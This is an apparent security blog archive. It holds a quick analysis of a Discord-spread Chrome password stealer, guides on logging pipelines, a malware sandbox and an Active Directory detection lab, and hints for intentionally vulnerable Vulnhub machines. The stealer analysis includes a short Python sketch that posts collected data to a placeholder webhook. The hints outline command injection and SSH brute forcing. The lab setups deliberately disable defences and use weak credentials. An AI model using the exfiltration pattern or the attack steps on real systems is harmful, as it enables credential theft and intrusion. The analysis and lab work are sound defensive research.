Saturday, March 5, 2022

Quick analysis of stealer malware sent via Discord

Introduction:

Just a quick analysis of malware sent via Discord...

I got the malicious file from someone who received the file via Discord from a trusted account (which was compromised...)


Analysis:

Hash: 4f709e1c6951bbd65d03a9f44961e0ae

Original filename: Fruit_of_the_ace_v3.11.99.exe

The file looked like a Node.js binary.

pdb string: C:\Users\runneradmin\AppData\Local\Temp\pkg.3d5278e5642d39a96bc8ed09\node\out\Release\node.pdb


I started by analyzing the file locally but didn't get anywhere quickly, so I moved to Hatching Triage for analysis.

Results: https://tria.ge/220220-wnqp3sbeh6


Here's the process list:


The executable drops and starts temp.ps1, which contains code to hide the window.


Once the window is hidden, it seems to download and execute MachineMania.exe, which is a Python executable made with PyInstaller. The argument provided to MachineMania.exe during execution is a Discord webhook URL.

Looking through Triage and the file access activity, I see the following:


It appears to be looking for the applications listed above, but I'm not sure if it actually does anything when those apps are installed.


Network traffic kinda looks like this:

It looks like there is a connection to OneDrive. I was pretty sure that's where MachineMania.exe was being downloaded from, but I didn't see much in the pcap or Triage output.

I went back to the debugger and found in memory the exact OneDrive link hosting MachineMania.exe.



Looking at MachineMania.exe:

Hash: 725918a6ae94e864908946ebb5e98dee

This is a PyInstaller file.

I analyzed that file in Triage as well, but I replaced the Discord webhook with a webhook.site webhook.

https://tria.ge/220220-ycs26scgdr/behavioral1

File interaction looks a bit different in the analysis of this file. Unlike the original file, this one only looks at the Chrome folder.



The webhook requests look kinda like this:



It appears to be only looking at Chrome. 


To further analyze the file, I started decompiling the PyInstaller file to see what's inside of it.

I used this to extract the files: https://github.com/extremecoders-re/pyinstxtractor
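
If I remember right, usage is just python pyinstxtractor.py <file.exe>, and it drops the embedded .pyc files into a <file.exe>_extracted folder.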

I found the following files to be interesting:


The discordwebhook content looks like it's just doing a POST request.
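
Since a Discord webhook is really just an HTTP endpoint, the whole exfil mechanism boils down to one POST. A minimal sketch in Python (the webhook URL here is a placeholder, and the requests library is assumed):

  import requests

  # Placeholder URL; the real one is what the stealer receives as its argument.
  WEBHOOK_URL = "https://discord.com/api/webhooks/<id>/<token>"

  # Discord webhooks accept a JSON body; "content" is the message text.
  requests.post(WEBHOOK_URL, json={"content": "collected data goes here"})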

I wasn't able to get anything out of the chrome.pyc file, but it appears to be packed with PyArmor.


Additionally, while doing some analysis of the original file in the debugger, I also saw this:



I'm not really sure what other capabilities the original file has. There is probably more, but I mostly looked at the dropped PyInstaller/MachineMania.exe file. I'm also not sure how Node.js code can be packed as an executable.


Conclusion

Based on limited and quick analysis, it looks like a compromised account will share the exe file.

The original exe file will download and execute a file from OneDrive.

The OneDrive file will steal data and send it to Discord via a webhook.

To me, the OneDrive file only seems to be stealing Chrome saved passwords and nothing else.


Similar sample: https://twitter.com/GlitchyPSI/status/1439674473515569154

https://www.virustotal.com/gui/file/60e75541c4b4130151fb2b80f04cd699ba0e66bf6c4ec364127e93a38dccefa9/relations

Check the Execution Parents. There are a lot of node binaries, and the filenames usually look like names of games.

Sunday, December 12, 2021

notes/links about log collection, storage, and searching

Introduction

Just some notes about log collection, storage, and searching.

I just want to be able to store some log data for a long time and search it once in a while later on. I'm not trying to produce reports with the data, do alerting, or transport the logs securely.

One of my use cases is collecting network data and storing that for a long time and maybe searching for a specific domain or IP in the future that could've been related to a security incident. 

Similarly for incoming HTTP traffic: I'd like to see if someone tried to access a specific URI a really long time ago (maybe back when a vuln related to that URI wasn't public yet).

(I'm leaving out Elasticsearch-based things, Splunk, and cloud-based services.)

These notes/links should help with research if anyone else is trying to do the same thing as me.


Gathering & shipping logs:

For Windows Event Logs:

- fluentbit - https://docs.fluentbit.io/manual/pipeline/inputs/windows-event-log

- fluentd - https://docs.fluentd.org/input/windows_eventlog

- nxlog - https://nxlog.co/docs/nxlog-ce/nxlog-reference-manual.html#im_msvistalog

- winlogbeat - https://www.elastic.co/downloads/beats/winlogbeat-oss

- promtail - https://grafana.com/docs/loki/latest/clients/promtail/scraping/#windows-event-log


- Windows Event Forwarding - https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection (WEF sends logs from all the hosts to one collector host)

For other text-file-based logs (Linux, webapps, etc.):

- all the tools above

- vector - https://vector.dev/components/

- filebeat - https://www.elastic.co/downloads/beats/filebeat-oss

- rsyslog - https://www.rsyslog.com/

- syslog-ng - https://www.syslog-ng.com/products/open-source-log-management/

- logstash - https://www.elastic.co/downloads/logstash-oss


Some of the tools listed above can take in forwarded events (syslog, logstash/beats, etc.) from other products and tools as well.


- kafka - https://kafka.apache.org/ (another option for getting logs from various sources and forwarding them somewhere else)


input/output, sources/sinks:

- kafka - https://cwiki.apache.org/confluence/display/KAFKA/Ecosystem

- vector - https://vector.dev/components/

- fluentbit - https://docs.fluentbit.io/manual/pipeline/inputs 

https://docs.fluentbit.io/manual/pipeline/outputs

- fluentd - https://docs.fluentd.org/input

https://docs.fluentd.org/output

- logstash - https://www.elastic.co/guide/en/logstash/current/input-plugins.html

https://www.elastic.co/guide/en/logstash/current/output-plugins.html

- rsyslog - https://www.rsyslog.com/plugins/


Log processing:

You may want to process the data to drop certain events or append data to some events. For example, for network data, you may want to use a filter that adds geoip info. You may also want to rename fields.

Many of the collectors and shippers listed above already have some ability to modify or parse the log data. 

Some of the tools call these plugins/modules filters, processors, or transformers. You may also be able to write your own plugins or some code (some tools above support Lua) to change the logs before the output stage happens.

Depending on the type of processing you want to do, you may need to output the logs in a different format that your application understands, then process them and put them back into the pipeline for the next step or for storage.

For Kafka, I found Faust (https://faust.readthedocs.io/en/latest/), but there are other libraries for Python and other languages too.
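
To give an idea of what that looks like, here's a rough Faust sketch (topic names and fields are made up; assumes a local Kafka broker and JSON events):

  import json
  import faust

  app = faust.App("log-processor", broker="kafka://localhost:9092")
  raw_logs = app.topic("raw-logs", value_type=bytes)      # made-up topic
  clean_logs = app.topic("clean-logs", value_type=bytes)  # made-up topic

  @app.agent(raw_logs)
  async def process(stream):
      async for raw in stream:
          event = json.loads(raw)
          # Drop events you don't care about...
          if event.get("event_type") == "heartbeat":
              continue
          # ...or append data (a real geoip lookup would go here).
          event["enriched"] = True
          await clean_logs.send(value=json.dumps(event).encode())

  if __name__ == "__main__":
      app.main()

Running python log_processor.py worker starts the processor.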


Log storage:

The output part of almost all the tools listed above can send data to various places where logs can be indexed and/or stored.

You can always store logs on disk on one host with compression (obviously, searching those is not very fun). Files can also be stored in the cloud; pretty much everything has S3 output support.

For files stored on disk, many of the tools will let you select a format such as text, JSON, etc.

Tools such as logrotate can be used to move, compress, or delete the logs (https://linux.die.net/man/8/logrotate)

Cron jobs/scheduled tasks and some scripts can always be used to move, compress, or delete files as well.

For easily storing and searching logs, there is Grafana Loki - https://www.boredhackerblog.info/2021/11/collecting-unifi-logs-with-vector-and.html

Grafana Loki is somewhat similar to Elasticsearch or Splunk, and you can use the Grafana web UI to query the data.

While doing more research, I came across ClickHouse (https://clickhouse.com/), which is also supported as an output by some of the tools above. ClickHouse can store JSON data, and you can run SQL queries on that data.
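
For example, a search with the clickhouse-driver Python library could look something like this (the table and column names are made up; adjust to however you actually store the logs):

  from clickhouse_driver import Client  # pip install clickhouse-driver

  client = Client(host="localhost")
  rows = client.execute(
      "SELECT timestamp, message FROM logs "
      "WHERE message LIKE %(needle)s ORDER BY timestamp DESC LIMIT 100",
      {"needle": "%evil-domain.example%"},
  )
  for ts, msg in rows:
      print(ts, msg)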

I also came across cloki, which uses ClickHouse while emulating Loki (https://github.com/lmangani/cloki).

The backend is a ClickHouse database, and you push logs into the Loki emulator just like you'd push logs into Loki. cloki also supports the same query language as Loki and will work with the Grafana Loki connector.


Log search:

How you search the logs obviously depends on how they're stored. For uncompressed or compressed logs, tools such as grep, zgrep, or ripgrep (https://github.com/BurntSushi/ripgrep) can be used for searching.

On Windows, there are a few tools that can be used to search and/or query logs. FileSeek (https://www.fileseek.ca/) can be used to search a bunch of files. There is LogFusion (https://www.logfusion.ca/) as well, which can be used to read log files.

There is also Log Parser Lizard (https://lizard-labs.com/log_parser_lizard.aspx) which can be used to query log files and even save queries and produce charts or reports.

Files can also be loaded into Python with pandas for simple searches, complex searches, or statistical analysis. pandas supports loading various file types (https://pandas.pydata.org/docs/reference/io.html).
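
A quick sketch of the kind of search I have in mind (file and column names are made up; assumes newline-delimited JSON logs):

  import pandas as pd

  # One JSON event per line.
  df = pd.read_json("weblogs.json", lines=True)

  # Everything that ever touched a specific URI...
  hits = df[df["uri"].str.contains("/some/old/vuln/path", na=False)]
  print(hits[["timestamp", "src_ip", "uri"]])

  # ...and something grep can't do easily: top source IPs for that URI.
  print(hits["src_ip"].value_counts().head(10))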

Finally, if you end up using Loki or cloki, Grafana can be used to do queries. Grafana also has connectors/plugins for other database/log storage systems.


Sample logs:

To play with any of the tools above without making changes in production env, you can use sample logs or data sources.

https://github.com/logpai/loghub - github repo that links to several sample logs

https://www.secrepo.com/ - security-related logs; there are some network traffic logs in there

https://www.sec.gov/dera/data/edgar-log-file-data-set.html - EDGAR log files

https://log-sharing.dreamhosters.com/ - various log files

https://www.logs.to/ - log generator (various types)

https://github.com/mingrammer/flog - log generator

https://certstream.calidog.io/ - certificate transparency logs

http://www.hivemq.com/demos/websocket-client/ / broker.mqttdashboard.com - If you want to grab MQTT demo data. I'm pretty sure people are using this for free for their projects too...



PS: I'm not an engineer or an observability expert. Implementations of the various tools above vary and may have an impact on resource usage.

Friday, November 26, 2021

Collecting Unifi logs with Vector and Grafana Loki

Introduction

This post discusses sending Unifi logs to Grafana Loki using the vector.dev agent.

Typically for log collection I would utilize something like Beats (Filebeat, Winlogbeat) and Logstash. Unfortunately, in my experience, Logstash uses too much memory and CPU, so I decided to search for an alternative. I came across vector.dev, fluentd, and fluentbit. Vector.dev seemed to be easy to install, configure, and use, so I decided to give that a try.

For log storage and search, I would normally use Elasticsearch & Kibana, OpenSearch, Graylog, or Humio. Humio would be hosted in the cloud, and anything that's Elasticsearch or Elasticsearch-based would require too much memory and CPU. I found Grafana Loki and decided to try that; it seems relatively lightweight for my needs and runs locally. Also, I saw a Techno Tim video on Loki recently.

Logs will be stored with Loki and I'll use Grafana to connect to Loki and use it to query and display the data.

Vector and Grafana Loki will be running on a NUC with a Celeron CPU and 4GB RAM, so having something that can run on a Pi (Grafana has an article where they run Loki on a Pi) is nice.

Design

The Unifi controller has an option to send logs to a remote system, so that's what I'll be using to send logs. It sends syslog (UDP) to an IP address.

Vector has sources, transforms, and sinks. A source is the input/data source; transforms can apply various operations to the data, such as filtering or renaming fields; and a sink is basically the output. I will just be using a source and a sink. The source in this case will be syslog: Vector will listen on a port for syslog messages. The sink will be Loki, since that's where the logs will be stored.

I'll have one VM running Vector, and the same VM will be running the Grafana UI and Loki using docker-compose.

Unifi Controller Syslog -> (syslog source) Vector (Loki sink) -> Loki <- Grafana WebUI

I am not doing any encryption in transit or using authentication for Loki, though both are options.

Setup

I have an Ubuntu 20.04 server w/ docker and docker-compose installed.

Grafana Loki

The Grafana Docker tutorial shows how to set up Grafana Loki with docker-compose: https://grafana.com/docs/loki/latest/installation/docker/

I removed the promtail container from my configuration.

Here's the configuration I'm using:

https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260

Create new loki and grafana folders, which Docker will mount.

Download https://raw.githubusercontent.com/grafana/loki/v2.4.1/cmd/loki/loki-local-config.yaml, place it in the loki folder, and rename the file to local-config.yaml. Change the configuration if needed.

No need to download and place anything in the grafana folder.

Run docker-compose up -d to start grafana and loki.

The Grafana web UI runs on port 3000, and the default creds are admin/admin.

Go to Configuration and add Loki as the data source. The docker-compose file refers to that container as loki, so it'll be at http://loki:3100.




Vector

Now Vector needs to be set up.

I'm setting it up by just following their quickstart guide.

I ran: curl --proto '=https' --tlsv1.2 -sSf https://sh.vector.dev | bash

The default config file is located at ~/.vector/config/vector.toml

Here's my config for the syslog source and Loki sink:

https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260

I modified the syslog port to 1514 so I can run Vector as a non-privileged user, and I also changed the mode to udp.

For the Loki sink, a label is required, but your label key/value can be anything you prefer. I could have done labels.system = "unifi" and it would work just fine.

Once configuration is done, the following command can be run to start Vector: vector --config ~/.vector/config/vector.toml
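
Before touching the controller, you can sanity-check the pipeline by throwing a fake syslog message at Vector yourself. A quick Python sketch (assumes the UDP syslog source on port 1514 from my config):

  import socket

  # Minimal RFC 3164-style message aimed at Vector's syslog source.
  msg = "<134>Jan  1 00:00:00 testhost testapp: pipeline test message"
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  sock.sendto(msg.encode(), ("127.0.0.1", 1514))
  sock.close()

If the test message shows up when you query Loki in Grafana, the Vector-to-Loki leg is working.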

Unifi controller

In unifi controller settings, remote logging option is under Settings -> System -> Application Configuration -> Remote Logging

Here's what my configuration looks like:

Click Apply to apply the changes, and the logs should flow to Vector and into Loki.




!!!

no logs in grafana query

I did have a weird issue where logs didn't show up in a Grafana query but would show up when I did a live query.

I ran "sudo timedatectl set-timezone America/New_York" to update my timezone and that fixed the issue. (or it didn't but i think it did because queries did show results after i ran this)

!!!

Saturday, April 10, 2021

Creating a malware sandbox for sysmon and windows event logs with virtualbox and vmexec

Introduction

I was doing some research around detection related to maldocs/initial access. Usually, I've seen malicious Word or Excel documents and, in some cases, compressed files containing a Word document, Excel document, script, or executable. In a lot of cases, LOLBINs/LOLBAS are abused. You can see this happening in a lot of sandbox outputs (any.run, VT dynamic analysis, Hatching Triage, etc.) as well.

I came across some guidance around blocking some LOLBIN/LOLBAS files with Windows Firewall to prevent some of the initial compromise activity. There are multiple scripts and blog posts related to this. Essentially, Windows Firewall rules are added to prevent some of the executables from connecting to the internet.

Scripts/Blogs:

https://daniel.streefkerkonline.com/2017/10/24/mitigate-commodity-malware-attacks-with-windows-firewall-rules/

https://call4cloud.nl/2020/07/the-windows-firewall-rises/

https://gist.github.com/ricardojba/ecdfe30dadbdab6c514a530bc5d51ef6#file-windows_hardening-cmd-L497

https://gist.github.com/jaredhaight/e88b4323adce06395dace501841d3075#file-windows_hardening-cmd-L108


I also saw posts where Olaf Hartong was discussing sandbox data related to malware and LOLBIN/LOLBAS usage, as well as rundll32.

https://twitter.com/olafhartong/status/1359235339332780034

https://twitter.com/olafhartong/status/1361415502447267842


I thought it would be interesting to collect data on my own and have my own dataset to play with. I also wanted the ability to test malware in an environment where some hardening was applied, such as that mentioned in the blog posts and scripts above. In addition to that, I wanted the ability to have an EDR or AV agent in the same sandbox to see what it collects or alerts on in its management console. I ended up writing vmexec to help me with this.

vmexec is similar to Cuckoo Sandbox and CAPE Sandbox, but it doesn't get any information back from the VMs; it just puts the executable in the VM and executes it. When you upload a sample, you can pick a specific VM or use any available VM, and set how long the VM will run after the sample is uploaded. It uses VirtualBox for the VMs, and just like Cuckoo or CAPE, you need to have an agent inside the VM.

https://github.com/BoredHackerBlog/vmexec
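
Conceptually, the agent boils down to something like the sketch below. This is not the actual agent.py (see the repo for that); the endpoint, field name, path, and port here are made up. It just receives a file over HTTP, drops it to disk, and executes it without collecting anything back.

  import subprocess
  from flask import Flask, request

  app = Flask(__name__)

  @app.route("/run", methods=["POST"])  # made-up endpoint
  def run():
      f = request.files["sample"]  # made-up form field name
      path = "C:\\Users\\user\\Desktop\\" + f.filename
      f.save(path)
      subprocess.Popen([path])  # fire and forget; nothing is sent back
      return "ok"

  if __name__ == "__main__":
      app.run(host="0.0.0.0", port=8000)  # made-up port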


Design

I'll be using a Windows 10 VM with various logging enabled and Sysmon installed. I'm using sysmon-modular rules (https://github.com/olafhartong/sysmon-modular).

For forwarding logs, I'll be using Winlogbeat OSS (https://www.elastic.co/downloads/beats/winlogbeat-oss). I'm using the OSS version because I'll be using Open Distro for Elasticsearch and Kibana containers (https://opendistro.github.io/for-elasticsearch/).

Since I'll be running malware, I'll have to have a second VM for routing the malicious traffic, but it's not required if you're okay with threat actors potentially seeing your connections. You can also set up the sandbox VM so it doesn't route any traffic at all.

The network and VM design kinda looks like this:



Setup

Getting all the packages and dependencies:

  1. Install Ubuntu 20.04 (although pretty much any Linux OS should work)
  2. Install Docker (https://get.docker.com/)
  3. Install docker-compose (https://docs.docker.com/compose/install/)
  4. Install Virtualbox (https://linuxize.com/post/how-to-install-virtualbox-on-ubuntu-20-04/)
  5. Make sure python3 and python3-pip are installed
    1. Might have to run apt install python3 python3-pip
  6. Install python packages
    1. Run the commands below:
      1. pip3 install flask
      2. pip3 install flask-sqlalchemy
      3. pip3 install flask-admin
  7. Download vmexec https://github.com/BoredHackerBlog/vmexec
    1. if you have git installed you can run:
      1. git clone https://github.com/BoredHackerBlog/vmexec

Getting Elastic and Kibana up and running:

I'm using a docker-compose file for Elastic and Kibana.

research@workstation13:~/elk$ cat docker-compose.yml
version: '3'
services:
  odfe-node1:
    image: amazon/opendistro-for-elasticsearch:1.13.1
    container_name: odfe-node1
    environment:
      - discovery.type=single-node
      - bootstrap.memory_lock=true # along with the memlock settings below, disables swapping
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m" # minimum and maximum Java heap size, recommend setting both to 50% of system RAM
    ulimits:
      memlock:
        soft: -1
        hard: -1
      nofile:
        soft: 65536 # maximum number of open files for the Elasticsearch user, set to at least 65536 on modern systems
        hard: 65536
    volumes:
      - odfe-data1:/usr/share/elasticsearch/data
    ports:
      - 9200:9200
    networks:
      - odfe-net
  kibana:
    image: amazon/opendistro-for-elasticsearch-kibana:1.13.1
    container_name: odfe-kibana
    ports:
      - 5601:5601
    expose:
      - "5601"
    environment:
      ELASTICSEARCH_URL: https://odfe-node1:9200
      ELASTICSEARCH_HOSTS: https://odfe-node1:9200
    networks:
      - odfe-net

volumes:
  odfe-data1:

networks:
  odfe-net:


In the docker-compose.yml file shown above, the data is stored in the odfe-data1 volume. When you take down the containers and bring them up again, the data will not go away.

Additional information about the Open Distro for Elasticsearch Docker containers and settings can be found here: https://opendistro.github.io/for-elasticsearch-docs/docs/install/docker/

cd into the directory that contains the docker-compose.yml file and run docker-compose up -d to start the containers in the background. To take down the containers, you can run docker-compose down from the same directory.

Once you bring up the containers, Elastic will be running on port 9200 and Kibana will be on 5601.


Setting up Windows 10 Sandbox

  1. Create a Windows 10 VM in virtualbox
  2. Disable updates
  3. Disable antivirus
  4. Disable UAC
  5. Disable anything else that's not needed
  6. Install whatever applications you need, such as a pdf reader or Office
    1. If you're using Office (Word or Excel), ensure to allow macros to run automatically (https://support.microsoft.com/en-us/topic/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6)
  7. Install Python 3+
  8. Copy agent.py from vmexec project into the VM (do not run it yet)
These should help with disabling some things: https://github.com/BoredHackerBlog/LogDetectionLab/blob/main/change_sec_config.bat

https://github.com/BoredHackerBlog/loggingstuff/blob/main/loggingstuff.bat

Setting up logging and log forwarding:
  1. Download sysmon and install Sysmon with sysmon-module rules (see the loggingstuff.bat link above)
  2. Enable process auditing and powershell logging (https://redblueteam.wordpress.com/2020/02/08/enable-command-line-and-powershell-audit-for-better-threat-hunting/)
  3. Download and install winlogbeat oss
    1. Configure Winlogbeat OSS to forward logs to 192.168.56.1, which is where Elastic will be running once we create the host-only adapter


After the base VM is setup, there are some network modifications that are needed.

You will need to create a host-only adapter without a DHCP server enabled.

Enable the second NIC on the VM and attach it to the host-only adapter.

Set the first NIC/adapter to NAT, internal network, or whatever else; I have mine set to an internal network going to my router.

Finally, turn on the VM and set a static IP for the adapter in Windows. Since my vboxnet0 host-only adapter is using 192.168.56.1/24, I set my IP to 192.168.56.2.

Reboot the VM, log in, run agent.py, and take a snapshot while the VM is running. Note the IP address, snapshot name, and VM name.

Setting up vmexec
In app.py, just search for #CHANGEME and modify the settings there.

You'll want to add your VM like this:

db.session.add(VMStatus(name="winVM",ip="10.0.0.178",snapshot="Snapshot2", available=True))

name is the name you gave your VM in virtualbox, IP is the static IP that was assigned, and snapshot is the snapshot you're utilizing.


Usage

To start using vmexec, you need the Docker containers for Elastic and Kibana running (cd into the directory with your docker-compose.yml file and type docker-compose up -d), and you need your router VM up and running (you can just start that VM). Finally, you need to start vmexec: cd into the vmexec directory and type flask run -h 0.0.0.0 (the -h 0.0.0.0 part is needed if you want to remotely access the web server). The web server will be running on port 5000.

The web UI looks like this:


You can select and upload a file, select a specific VM from the dropdown menu (optional), change the VM run time, and click the submit button.


You can access Kibana on port 5601 via a web browser. Make sure to set up your index pattern; it should be winlogbeat-*.


In Kibana, you can search for the executable file that was run and look at the surrounding events. With sysmon-modular rules, you can also map events to the MITRE ATT&CK framework.




Modifying the project

Modifying the project is easy depending on your needs. agent.py can be modified easily if you would like to upload files to a specific location or execute/open them in a certain way. Code could also be added to the vm_process function if additional steps need to be taken before or after running the VM or the file.


Resources

https://cuckoosandbox.org/

https://github.com/kevoreilly/CAPEv2

https://github.com/BoredHackerBlog/capev2-virtualbox-install

https://github.com/BoredHackerBlog/vmexec

https://www.docker.com/

https://opendistro.github.io/for-elasticsearch/

https://www.elastic.co/downloads/beats/winlogbeat-oss

https://github.com/olafhartong/sysmon-modular

https://www.virtualbox.org/



Saturday, January 30, 2021

Creating an Active Directory (AD) lab for log-based detection research and development with Vagrant, Humio, and AtomicRedTeam

introduction

A few years or months ago, I came across the DetectionLab project and thought it was neat. It would let me conduct attacks, work on detection rules, and test those rules. DetectionLab uses Splunk for storing logs, which I'm not used to, and it also requires more system resources than my machine has.

I then came across DetectionLabELK, which is similar to DetectionLab but uses the ELK stack, which I am familiar with; however, I had the same issue with system requirements and with not needing some of the components of the project. The DetectionLabELK people (CyberDefenders) provide a cloud version of it, which is very cheap if you want to utilize it for testing things, but I still wanted to have something on my own machine.

I did build an AD lab manually; however, after not taking snapshots and breaking the lab, I decided that I should just use Vagrant.

For my lab needs, I just need to look at logs, not network traffic. I also just need one DC, one workstation, and a Kali VM. I'm very familiar with Humio, so I decided to use a Humio cloud (free) account to store and search my logs. Kali is good for doing certain attacks, but I also wanted AtomicRedTeam so I could use it for generating log data and testing queries. The AD lab I made was also inspired by the Applied Purple Teaming course and TheCyberMentor's ethical hacking course.

design

Domain: testlab.local
Computers: dc1 - 192.168.200.11 - windows server 2019 desktop
workstation1 - 192.168.200.12 - windows 10
kali - no IP initially, you have to set it to 192.168.200.13 - kali linux

Users:
local user: vagrant / vagrant works on all machines
domain users: 
jsmith / Password123
jdoe / 123Password
SQLService / Servicepass123

All domain users are in the Domain Admins, Administrators, and Enterprise Admins groups.

jsmith is a local admin on workstation1

setup

system requirements:
Any modern 4-core/8-thread CPU should be fine; I'm using an i7-6700HQ.
Around 16GB of RAM should work fine as well.

virtualbox download and installation:
Download and install VirtualBox from here: https://www.virtualbox.org/wiki/Downloads
Install the Oracle VM VirtualBox Extension Pack as well.

vagrant download and installation:
Download and install vagrant from here: https://www.vagrantup.com/downloads
Once vagrant is installed, open a command line and run "vagrant plugin install vagrant-reload" to install the reload plugin. More info here: https://github.com/aidanns/vagrant-reload

downloading the github project:
Download the zip and unzip it or run git clone https://github.com/BoredHackerBlog/LogDetectionLab

setting up humio:
Get a Humio account and log in at cloud.humio.com
Create a new token for this project. You can leave the parser as None. Copy the token.
Edit the winlogbeat.yml file and change the password to your token.

usage

Vagrant command line guide: https://www.vagrantup.com/docs/cli

Open command prompt and cd into the LogDetectionLab folder.
Type vagrant up to bring up all 3 virtual machines.
Your initial run will download the VM boxes and set everything up. This may take 30 minutes to an hour. 

Once all the machines are up and running and the vagrant command exits in the command prompt, you will need to log into the Kali Linux VM and change the eth1 IP to 192.168.200.13.

You will have to disable Defender on workstation1 and install invoke-atomicredteam manually (check the GitHub page for bugs).

For using invoke-atomicredteam, you will need to open PowerShell and run: Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force

You can also do vagrant up MACHINENAME, such as vagrant up dc1.

To tear down the lab, you need to run vagrant destroy -f. This will shut down the VMs and remove them.

Vagrant also supports making snapshots and you can read more about that here: https://www.vagrantup.com/docs/cli/snapshot

modifying the project

Vagrantfile - this can be changed to modify VM CPU and memory resources, how port forwarding works, hostnames, IP addresses, and the scripts that run.

install-dc.ps1 - domain controller promotion script

join-domain.ps1 - joins the computer to the domain and adds jsmith as a local admin

create-users.ps1 - creates users on the dc

create-smbshare.ps1 - create an smb share on the dc

change_ui.ps1 - changes some Windows settings so the UI is adjusted for best performance

change_sec_config.bat - disables updates, the firewall, Defender, and UAC, and enables RDP

install-atomicredteam.ps1 - installs invoke-atomicredteam

enable_logging.bat - enables a bunch of logging stuff, installs sysmon with olafhartong config, and downloads winlogbeat

winlogbeat.yml - winlogbeat config file. You'll have to edit this to change where the logs go. Also, as you start seeing event IDs that are not useful, you can edit this to remove them, or modify enable_logging.bat to avoid enabling certain events.

setup_winlogbeat.bat - sets up winlogbeat

challenges

I kept getting errors after I promoted the domain controller and then tried to reboot. The errors were related to WinRM. I added

  config.winrm.transport = :plaintext
  config.winrm.basic_auth_only = true

to the Vagrantfile and executed "reg add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /d 0 /t REG_DWORD /f /reg:64" before promoting, and that seemed to fix the issue.

At the time of posting this blog post, I'm having an issue with workstation1 not installing atomicredteam correctly. AV doesn't get turned off for some reason.

I can't change the IP address on Kali through Vagrant.

me typing vagrant destory -f for 10 minutes trying to figure out why it didn't work was also challenging. 

resources


Sunday, July 5, 2020

Openfaas and infosec uses

OpenFaaS:

OpenFaaS is a function-as-a-service project that can be self-hosted, much like AWS Lambda or Google Cloud Functions. Essentially, instead of writing a full project that does various things, you write and maintain functions instead. OpenFaaS can be deployed with Docker Swarm, Kubernetes, or OpenShift.

The OpenFaaS documentation is pretty clean and easy to understand. To use it, you need Docker Swarm, Kubernetes, or OpenShift. Once you deploy OpenFaaS, you need to create a function and deploy it. There are several ways to supply data to a function; one of them is via HTTP requests.

You can use a function in a sync or async way without modifying any code at all; you just modify the URL you're sending the HTTP requests to. In addition to that, OpenFaaS will do scaling on its own: if you're using a function a lot, OpenFaaS will spin up containers for that specific function automatically. It's also possible to utilize CI/CD with OpenFaaS to ensure that deploying changes to functions is easy and quick.

I've been mainly experimenting with OpenFaaS on Vultr, but it's also possible to play with it in Docker Playground.

Infosec use cases:

I looked through some of my past projects, and I can see myself using OpenFaaS if I were to rewrite them. For example, file analysis: it is possible to combine OpenFaaS with other technologies such as Redis (to keep track of operations) and Minio (to allow download/upload of files/artifacts inside functions) to analyze malicious files or extract metadata from files. In addition to this, you can also implement machine learning: analyze features of a bunch of PE files in a function and return info about whether they are malicious or not.

Another use case is analyzing phishing links. I wrote a Golang project that takes links from PhishTank, splits them into more URLs recursively, and checks each URL to see if there is an open directory. It's possible to implement this completely with OpenFaaS. For example, you could send PhishTank data to an OpenFaaS function every 8 hours and split each link into multiple URLs, send the URLs to another function to detect open directories, and finally send the URLs that have open directories to another function that downloads files (phishing kit zip files in most cases) from the open directory.
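
The URL-splitting part is simple enough to sketch (my original project was Golang; this Python version is just for illustration):

  from urllib.parse import urlsplit

  def parent_urls(url):
      # http://x/a/b/kit.zip -> http://x/a/b/, http://x/a/, http://x/
      parts = urlsplit(url)
      segments = [s for s in parts.path.split("/") if s]
      urls = []
      for i in range(len(segments) - 1, -1, -1):
          path = "/".join(segments[:i])
          urls.append(f"{parts.scheme}://{parts.netloc}/{path}/" if path
                      else f"{parts.scheme}://{parts.netloc}/")
      return urls

Each URL returned by something like this would then go to the open-directory-detection function.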

Log analysis or enrichment is another use case. For example, if you were receiving logs about remote sign-ins, you could send the logs, in batches or individually, to a function or functions that extract the IP and enrich the log based on API lookups for that IP, such as geolocation.
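
A sketch of what that enrichment function might look like using the OpenFaaS Python template (which expects a handle(req) entrypoint); the field names here are made up:

  # handler.py
  import json

  def handle(req):
      event = json.loads(req)
      ip = event.get("source_ip", "")  # made-up field name
      # A real function would call a geoip/reputation API here.
      event["enrichment"] = {
          "is_private": ip.startswith(("10.", "172.16.", "192.168.")),
      }
      return json.dumps(event)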

OpenFaaS can be useful for doing analysis of forensic artifacts. If you're working an incident and need to analyze artifacts from hundreds of computers, you can collect the evidence, throw it in Minio, have a bunch of functions analyze the evidence, and maybe even send the output to another set of functions for enrichment before sending the final evidence to storage or a SIEM.



I discovered the OpenFaaS project earlier this month; it has been fun to play with, and I can see myself using it a lot. Being able to deploy and maintain specific functions instead of a huge application is much easier for me. Also, not having to write threaded code, since OpenFaaS does automated scaling, is very nice.

Links:

https://www.openfaas.com/
https://docs.openfaas.com/deployment/
https://docs.openfaas.com/reference/triggers/
https://docs.openfaas.com/reference/async/
https://docs.openfaas.com/reference/cicd/intro/
https://www.vultr.com/docs/deploying-openfaas-using-docker-swarm
https://docs.openfaas.com/deployment/play-with-docker/
https://redis.io/
https://min.io/
https://www.phishtank.com/
https://blog.alexellis.io/openfaas-storage-for-your-functions/
https://youtu.be/XiagsmRVoNY

https://www.vultr.com/?ref=7127410 (Affiliate link...)

Saturday, April 25, 2020

Vulnhub VMs and guide/hints

I released some VMs on Vulnhub almost a month ago.


This post has guides/hints for those VMs.

Cloud Antivirus/Cloud AV:
1. Start by port scanning your network and locate the Easy Cloud AV VM’s IP address.
a. Ports 22 and 8080 should be open, and the MAC address should be 08:00:27:BA:A5:BA
2. Do an Aggressive nmap scan on the target IP address and find out what services are running.
3. Visit the web server running on the target IP
4. You were not provided an Invite code. Bypass the Invite code page.
a. Input data in the invite form field to cause an error on the web server
b. Read the error messages and craft input to bypass the invite code page
5. Get command line injection on the scanner page
a. Based on scanner output, determine what the input could have been
b. Inject your own commands
c. To make sure command execution works, cat /etc/hostname
i. Output from it will be “cloudav”
6. Gather information about the users
a. View linux files that could contain user information
7. Brute force port 22/SSH
a. Use the gathered usernames to build a list of usernames and passwords
